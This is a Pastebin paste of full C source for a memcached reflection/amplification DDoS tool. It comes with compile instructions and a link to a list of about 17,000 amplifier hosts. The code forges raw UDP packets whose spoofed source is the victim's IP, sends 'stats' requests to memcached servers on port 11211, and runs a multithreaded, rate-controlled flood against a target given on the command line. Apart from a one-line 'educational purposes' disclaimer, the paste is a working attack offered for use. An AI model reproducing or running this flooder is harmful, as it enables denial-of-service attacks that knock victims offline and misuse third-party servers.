API tools faq
paste
zeeshan-haxor-zesn

Memcached tool / Another Memcached-PoC

zeeshan-haxor-zesn
Mar 8th, 2018
256
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.04 KB | None | 0 0
raw download clone embed print report
  1. [Another Memcached-PoC]
  2. [Memcached.c Proof of Concept Memcached tool]
  3. /**
  4. memcached-PoC
  5.  
  6. memcached Proof of Concept Amplification via spoofed source UDP packets. Repo includes source code for PoC and approximately 17,000 AMP hosts.
  7.  
  8. memcached.c - Source code (https://pastebin.com/raw/YW1n1Sn3)
  9. memecache-amp list - List of memcached servers (https://pastebin.com/raw/2ryxWB4t)
  10.  
  11. Compile: gcc memcached.c -o memecached -pthread
  12.  
  13. *Educational and/or testing purposes only. *Use of these tools against an unauthorized party may be unethtical, rude, and even illegal in some countries.
  14.  
  15. **/
  16.  
  17. /*
  18. memcache reflection script
  19. greeting: syn, storm, krashed, chrono, spike, niko, disliked
  20. Use with extreme Caution
  21. https://twitter.com/hypoweb
  22. */
  23.  
  24. #include <time.h>
  25. #include <pthread.h>
  26. #include <unistd.h>
  27. #include <stdio.h>
  28. #include <stdlib.h>
  29. #include <string.h>
  30. #include <sys/socket.h>
  31. #include <netinet/ip.h>
  32. #include <netinet/udp.h>
  33. #include <arpa/inet.h>
  34. #define MAX_PACKET_SIZE 8192
  35. #define PHI 0x9e3779b9
  36. static uint32_t Q[4096], c = 362436;
  37. struct list
  38. {
  39. struct sockaddr_in data;
  40. struct list *next;
  41. struct list *prev;
  42. };
  43. struct list *head;
  44. volatile int tehport;
  45. volatile int limiter;
  46. volatile unsigned int pps;
  47. volatile unsigned int sleeptime = 100;
  48. struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
  49. void init_rand(uint32_t x)
  50. {
  51. int i;
  52. Q[0] = x;
  53. Q[1] = x + PHI;
  54. Q[2] = x + PHI + PHI;
  55. for (i = 3; i < 4096; i++)
  56. {
  57. Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  58. }
  59. }
  60. uint32_t rand_cmwc(void)
  61. {
  62. uint64_t t, a = 18782LL;
  63. static uint32_t i = 4095;
  64. uint32_t x, r = 0xfffffffe;
  65. i = (i + 1) & 4095;
  66. t = a * Q[i] + c;
  67. c = (t >> 32);
  68. x = t + c;
  69. if (x < c) {
  70. x++;
  71. c++;
  72. }
  73. return (Q[i] = r - x);
  74. }
  75. unsigned short csum (unsigned short *buf, int nwords)
  76. {
  77. unsigned long sum = 0;
  78. for (sum = 0; nwords > 0; nwords--)
  79. sum += *buf++;
  80. sum = (sum >> 16) + (sum & 0xffff);
  81. sum += (sum >> 16);
  82. return (unsigned short)(~sum);
  83. }
  84. void setup_ip_header(struct iphdr *iph)
  85. {
  86. iph->ihl = 5;
  87. iph->version = 4;
  88. iph->tos = 0;
  89. iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 15;
  90. iph->id = htonl(54321);
  91. iph->frag_off = 0;
  92. iph->ttl = MAXTTL;
  93. iph->protocol = IPPROTO_UDP;
  94. iph->check = 0;
  95. iph->saddr = inet_addr("192.168.3.100");
  96. }
  97. void setup_udp_header(struct udphdr *udph)
  98. {
  99. udph->source = htons(5678);
  100. udph->dest = htons(11211);
  101. udph->check = 0;
  102. memcpy((void *)udph + sizeof(struct udphdr), "\x00\x01\x00\x00\x00\x01\x00\x00stats\r\n", 15);
  103. udph->len=htons(sizeof(struct udphdr) + 15);
  104. }
  105. void *flood(void *par1)
  106. {
  107. struct thread_data *td = (struct thread_data *)par1;
  108. char datagram[MAX_PACKET_SIZE];
  109. struct iphdr *iph = (struct iphdr *)datagram;
  110. struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
  111. struct sockaddr_in sin = td->sin;
  112. struct list *list_node = td->list_node;
  113. int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
  114. if(s < 0){
  115. fprintf(stderr, "Could not open raw socket.\n");
  116. exit(-1);
  117. }
  118. init_rand(time(NULL));
  119. memset(datagram, 0, MAX_PACKET_SIZE);
  120. setup_ip_header(iph);
  121. setup_udp_header(udph);
  122. udph->source = htons(rand() % 65535 - 1026);
  123. iph->saddr = sin.sin_addr.s_addr;
  124. iph->daddr = list_node->data.sin_addr.s_addr;
  125. iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
  126. int tmp = 1;
  127. const int *val = &tmp;
  128. if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  129. fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
  130. exit(-1);
  131. }
  132. init_rand(time(NULL));
  133. register unsigned int i;
  134. i = 0;
  135. while(1){
  136. sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
  137. list_node = list_node->next;
  138. iph->daddr = list_node->data.sin_addr.s_addr;
  139. iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  140. iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
  141.  
  142. pps++;
  143. if(i >= limiter)
  144. {
  145. i = 0;
  146. usleep(sleeptime);
  147. }
  148. i++;
  149. }
  150. }
  151. int main(int argc, char *argv[ ])
  152. {
  153. if(argc < 6){
  154. fprintf(stderr, "Invalid parameters!\n");
  155. fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
  156. exit(-1);
  157. }
  158. srand(time(NULL));
  159. int i = 0;
  160. head = NULL;
  161. fprintf(stdout, "Setting up sockets...\n");
  162. int max_len = 128;
  163. char *buffer = (char *) malloc(max_len);
  164. buffer = memset(buffer, 0x00, max_len);
  165. int num_threads = atoi(argv[4]);
  166. int maxpps = atoi(argv[5]);
  167. limiter = 0;
  168. pps = 0;
  169. int multiplier = 20;
  170. FILE *list_fd = fopen(argv[3], "r");
  171. while (fgets(buffer, max_len, list_fd) != NULL) {
  172. if ((buffer[strlen(buffer) - 1] == '\n') ||
  173. (buffer[strlen(buffer) - 1] == '\r')) {
  174. buffer[strlen(buffer) - 1] = 0x00;
  175. if(head == NULL)
  176. {
  177. head = (struct list *)malloc(sizeof(struct list));
  178. bzero(&head->data, sizeof(head->data));
  179. head->data.sin_addr.s_addr=inet_addr(buffer);
  180. head->next = head;
  181. head->prev = head;
  182. } else {
  183. struct list *new_node = (struct list *)malloc(sizeof(struct list));
  184. memset(new_node, 0x00, sizeof(struct list));
  185. new_node->data.sin_addr.s_addr=inet_addr(buffer);
  186. new_node->prev = head;
  187. new_node->next = head->next;
  188. head->next = new_node;
  189. }
  190. i++;
  191. } else {
  192. continue;
  193. }
  194. }
  195. struct list *current = head->next;
  196. pthread_t thread[num_threads];
  197. struct sockaddr_in sin;
  198. sin.sin_family = AF_INET;
  199. sin.sin_addr.s_addr = inet_addr(argv[1]);
  200. struct thread_data td[num_threads];
  201. for(i = 0;i<num_threads;i++){
  202. td[i].thread_id = i;
  203. td[i].sin= sin;
  204. td[i].list_node = current;
  205. pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
  206. }
  207. fprintf(stdout, "Starting flood...\n");
  208. for(i = 0;i<(atoi(argv[6])*multiplier);i++)
  209. {
  210. usleep((1000/multiplier)*1000);
  211. if((pps*multiplier) > maxpps)
  212. {
  213. if(1 > limiter)
  214. {
  215. sleeptime+=100;
  216. } else {
  217. limiter--;
  218. }
  219. } else {
  220. limiter++;
  221. if(sleeptime > 25)
  222. {
  223. sleeptime-=25;
  224. } else {
  225. sleeptime = 0;
  226. }
  227. }
  228. pps = 0;
  229. }
  230. return 0;
  231. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!